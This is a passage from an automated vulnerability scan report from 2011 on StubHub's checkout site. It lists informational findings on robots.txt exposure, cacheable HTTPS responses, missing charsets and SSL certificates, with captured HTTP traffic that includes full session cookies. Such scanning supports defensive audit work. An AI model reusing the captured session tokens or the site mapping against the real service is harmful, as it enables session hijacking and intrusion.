User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 200 OK
Date: Wed, 16 Feb 2011 11:43:11 GMT
Server: Apache
Set-Cookie: TLTHID=EE6B9DA839C110390021CBB526D2E967; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 3df#e6dd/help/services/popUp@srwp01myx006.stubprod.com
com-stubhub-dye: 3df#e6dd/help/services/popUp@srwp01myx006.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8

<div id="helpTopicNodeDiv"><div style="font-family:Arial,Helvetica,sans-serif;font-size:12px; margin-right:15px;">
<div style="margin-bottom:15px">
If you need immediate help give us a call. Our awa
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: buy.stubhub.com

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Set-Cookie: TLTHID=CF126D1A39C110398AF98DF1B8E58240; Path=/; Domain=.stubhub.com
Set-Cookie: TLTSID=CF126D1A39C110398AF98DF1B8E58240; Path=/; Domain=.stubhub.com
Last-Modified: Wed, 09 Feb 2011 22:23:41 GMT
Accept-Ranges: bytes
Content-Length: 11197
Keep-Alive: timeout=5, max=1600
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /abilizer/
Disallow: /agents/
Disallow: /aggies/
Disallow: /aolcontest/
Disallow: /aollocal/
Disallow: /aolmusic/
Disallow: /aolsearch/
Disallow: /aolsports/
Disallow: /aoltick
...[SNIP]...

10. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /howToEnableJavaScript.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /howToEnableJavaScript.html HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E4A3421C39C1103978D494000C1CF856; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Content-Length: 1064
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>How to enable JavaScript</title>
<style
...[SNIP]...

11. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /howToEnableJavaScript.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /howToEnableJavaScript.html HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E4A3421C39C1103978D494000C1CF856; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Content-Length: 1064
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>How to enable JavaScript</title>
<style
...[SNIP]...

12. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy.stubhub.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Nov 16 18:00:00 CST 2009
Valid to:  Thu Nov 17 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by CloudScan Vulnerability Crawler at Wed Feb 16 05:46:24 CST 2011.

The DORK Report

Loading